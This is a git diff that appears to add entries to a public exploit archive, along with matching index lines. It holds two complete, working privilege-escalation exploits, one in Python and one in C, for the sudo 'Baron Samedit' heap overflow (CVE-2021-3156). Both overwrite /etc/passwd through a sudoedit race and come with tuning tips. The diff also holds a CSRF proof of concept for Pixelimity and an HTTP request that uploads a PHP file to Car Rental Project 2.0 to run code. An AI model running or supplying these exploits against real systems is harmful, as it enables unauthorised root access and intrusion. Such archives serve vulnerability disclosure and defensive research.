diff --git a/exploits/multiple/local/49521.py b/exploits/multiple/local/49521.py new file mode 100755 index 000000000..79a7c2f36 --- /dev/null +++ b/exploits/multiple/local/49521.py @@ -0,0 +1,139 @@ +# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1) +# Date: 2021-02-02 +# Exploit Author: West Shepherd +# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1. +# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31 +# CVE : CVE-2021-3156 +# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code. +# Sources: +# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit +# (2) https://github.com/stong/CVE-2021-3156 +# Requirements: Python3 + +#!/usr/bin/python3 +import os +import pwd +import time +import sys +import argparse + + +class Exploit(object): + username = '' + size = 0 + data = '' + + def __init__(self, source, target, sleep): + self.sleep = sleep + self.source = source + self.target = target + + @staticmethod + def readFile(path): + return open(path, 'r').read() + + @staticmethod + def getUser(): + return pwd.getpwuid(os.getuid())[0] + + @staticmethod + def getSize(path): + return os.stat(path).st_size + + def main(self): + self.username = self.getUser() + self.data = self.readFile(self.source) + self.size = self.getSize(self.target) + environ = { + '\n\n\n\n\n': '\n' + self.data, + 'SUDO_ASKPASS': '/bin/false', + 'LANG': +'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', + 'A': 'A' * 0xffff + } + for i in range(5000): + directory = +'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i + overflow = +'11111111111111111111111111111111111111111111111111111111%s' % +directory + + if os.path.exists(directory): + sys.stdout.write('file exists %s\n' % directory) + continue + + child = os.fork() + os.environ = environ + if child: + sys.stdout.write('[+] parent %d \n' % i) + sys.stdout.flush() + time.sleep(self.sleep) + if not os.path.exists(directory): + try: + os.mkdir(directory, 0o700) + os.symlink(self.target, '%s/%s' % (directory, +self.username)) + os.waitpid(child, 0) + except: + continue + else: + sys.stdout.write('[+] child %d \n' % i) + sys.stdout.flush() + os.setpriority(os.PRIO_PROCESS, 0, 20) + os.execve( + path='/usr/bin/sudoedit', + argv=[ + '/usr/bin/sudoedit', + '-A', + '-s', + '\\', + overflow + ], + env=environ + ) + sys.stdout.write('[!] execve failed\n') + sys.stdout.flush() + os.abort() + break + + if self.size != self.getSize(self.target): + sys.stdout.write('[*] success at iteration %d \n' % i) + sys.stdout.flush() + break + sys.stdout.write(""" + \nConsider the following if the exploit fails: + \n\t(1) If all directories are owned by root then sleep +needs to be decreased. + \n\t(2) If they're all owned by you, then sleep needs +increased. + """) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser( + add_help=True, + description='* Sudo Privilege Escalation / Heap Overflow - +CVE-2021-3156 *' + ) + try: + parser.add_argument('-source', action='store', help='Path to +malicious "passwd" file to overwrite the target') + parser.add_argument('-target', action='store', help='Target +file path to be overwritten (default: /etc/passwd)') + parser.add_argument('-sleep', action='store', help='Sleep +setting for forked processes (default: 0.01 seconds') + parser.set_defaults(target='/etc/passwd', sleep='0.01') + + options = parser.parse_args() + if options.source is None: + parser.print_help() + sys.exit(1) + + exp = Exploit( + source=options.source, + target=options.target, + sleep=float(options.sleep) + ) + exp.main() + except Exception as err: + sys.stderr.write(str(err)) \ No newline at end of file diff --git a/exploits/multiple/local/49522.c b/exploits/multiple/local/49522.c new file mode 100644 index 000000000..5cc260334 --- /dev/null +++ b/exploits/multiple/local/49522.c @@ -0,0 +1,151 @@ +# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2) +# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty +# Date: 30.01.2021 +# Vendor: https://www.sudo.ws/ +# Link: https://www.sudo.ws/download.html +# CVE: CVE-2021-3156 + +[+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021 + +[Exploit Program Code] + +// Exploit by @gf_256 aka cts +// With help from r4j +// Debug by @nu11secur1ty +// Original advisory by Baron Samedit of Qualys + +// Tested on Ubuntu 18.04 and 20.04 & 20.04.01 +// You will probably need to adjust RACE_SLEEP_TIME. + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// !!! best value of this varies from system-to-system !!! +// !!! you will probably need to tune this !!! +#define RACE_SLEEP_TIME 10000 + +char *target_file; +char *src_file; + +size_t query_target_size() +{ + struct stat st; + stat(target_file, &st); + return st.st_size; +} + +char* read_src_contents() +{ + FILE* f = fopen(src_file, "rb"); + if (!f) { + puts("oh no baby what are you doing :("); + abort(); + } + fseek(f, 0, SEEK_END); + long fsize = ftell(f); + fseek(f, 0, SEEK_SET); + char *content = malloc(fsize + 1); + fread(content, 1, fsize, f); + fclose(f); + return content; +} + +char* get_my_username() +{ + // getlogin can return incorrect result (for example, root under su)! + struct passwd *pws = getpwuid(getuid()); + return strdup(pws->pw_name); +} + +int main(int my_argc, char **my_argv) +{ + puts("CVE-2021-3156 PoC by @gf_256"); + puts("original advisory by Baron Samedit"); + + if (my_argc != 3) { + puts("./meme "); + puts("Example: ./meme /etc/passwd my_fake_passwd_file"); + return 1; + } + target_file = my_argv[1]; + src_file = my_argv[2]; + printf("we will overwrite %s with stuff from %s\n", target_file, src_file); + + char* myusername = get_my_username(); + printf("hi, my name is %s\n", myusername); + + size_t initial_size = query_target_size(); + printf("%s is %zi big right now\n", target_file, initial_size); + + char* stuff_to_write = read_src_contents(); + + char memedir[1000]; + char my_symlink[1000]; + char overflow[1000]; + + char* bigstuff = calloc(1,0x10000); + memset(bigstuff, 'A', 0xffff); // need a big shit in the stack so the write doesn't fail with bad address + + char *argv[] = {"/usr/bin/sudoedit", "-A", "-s", "\\", overflow, NULL + }; + + char *envp[] = { + "\n\n\n\n\n", // put some newlines here to separate our real contents from the junk stuff_to_write, + "SUDO_ASKPASS=/bin/false", "LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +", bigstuff, NULL + }; + + puts("ok podracing time bitches"); + + // Boom =) + // for (int i = 0; i < 5000; i++) + for (int i = 0; i < 3000; i++) { + sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i); + sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir); + sprintf(my_symlink, "%s/%s", memedir, myusername); + puts(memedir); + + if (access(memedir, F_OK) == 0) { + printf("dude, %s already exists, do it from a clean working dir\n", memedir); + return 1; + } + + pid_t childpid = fork(); + if (childpid) { // parent + usleep(RACE_SLEEP_TIME); + mkdir(memedir, 0700); + symlink(target_file, my_symlink); + waitpid(childpid, 0, 0); + } else { // child + setpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race reliability + execve("/usr/bin/sudoedit", argv, envp); // noreturn + puts("execve fails?!"); + abort(); + } + + if (query_target_size() != initial_size) { + puts("target file has a BRUH MOMENT!!!! SUCCess???"); + system("xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'"); +// ayy lmao + return 0; + } + } + + puts("Failed?"); + puts("if all the meme dirs are owned by root, the usleep needs to be decreased."); + puts("if they're all owned by you, the usleep needs to be increased"); + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/49519.html b/exploits/multiple/webapps/49519.html new file mode 100644 index 000000000..96723655d --- /dev/null +++ b/exploits/multiple/webapps/49519.html @@ -0,0 +1,37 @@ +# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery +# Date: 2020-06-03 +# Exploit Author: Noth +# Vendor Homepage: https://github.com/pixelimity/pixelimity +# Software Link: https://github.com/pixelimity/pixelimity +# Version: v1.0 +# CVE : 2020-23522 + +Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter. + +PoC : + + + + +
+ + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/49520.py b/exploits/php/webapps/49520.py new file mode 100755 index 000000000..e630a1608 --- /dev/null +++ b/exploits/php/webapps/49520.py @@ -0,0 +1,40 @@ +# Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution +# Date: 3/2/2021 +# Exploit Author: Jannick Tiger +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/ +# Version: V 2.0 +# Tested on Windows 10, XAMPP + +POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) +Gecko/20100101 Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------346751171915680139113101061568 +Content-Length: 369 +Origin: http://localhost +Connection: close +Referer: http://localhost/carrental/admin/changeimage1.php?imgid=4 +Cookie: PHPSESSID=te82lj6tvep7afns0qm890393e +Upgrade-Insecure-Requests: 1 + +-----------------------------346751171915680139113101061568 +Content-Disposition: form-data; name="img1"; filename="1.php" +Content-Type: application/octet-stream + + +-----------------------------346751171915680139113101061568 +Content-Disposition: form-data; name="update" + + +-----------------------------346751171915680139113101061568-- + + +# Uploaded Malicious File can be Found in : +carrental\admin\img\vehicleimages\1.php +# go to http://localhost/carrental/admin/img/vehicleimages/1.php, Execute malicious code via post value phpinfo(); \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4d699dfdf..7ca8055c2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11252,6 +11252,8 @@ id,file,description,date,author,type,platform,port 49516,exploits/solaris/local/49516.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",2021-02-02,"Marco Ivaldi",local,solaris, 49517,exploits/solaris/local/49517.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2021-02-02,"Marco Ivaldi",local,solaris, 49518,exploits/solaris/local/49518.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3)",2021-02-02,"Marco Ivaldi",local,solaris, +49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",2021-02-03,"West Shepherd",local,multiple, +49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",2021-02-03,nu11secur1ty,local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43710,3 +43712,5 @@ id,file,description,date,author,type,platform,port 49511,exploits/php/webapps/49511.py,"Klog Server 2.4.1 - Command Injection (Authenticated)",2021-02-01,"Metin Yunus Kandemir",webapps,php, 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php, 49513,exploits/php/webapps/49513.txt,"Student Record System 4.0 - 'cid' SQL Injection",2021-02-02,"Jannick Tiger",webapps,php, +49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple, +49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,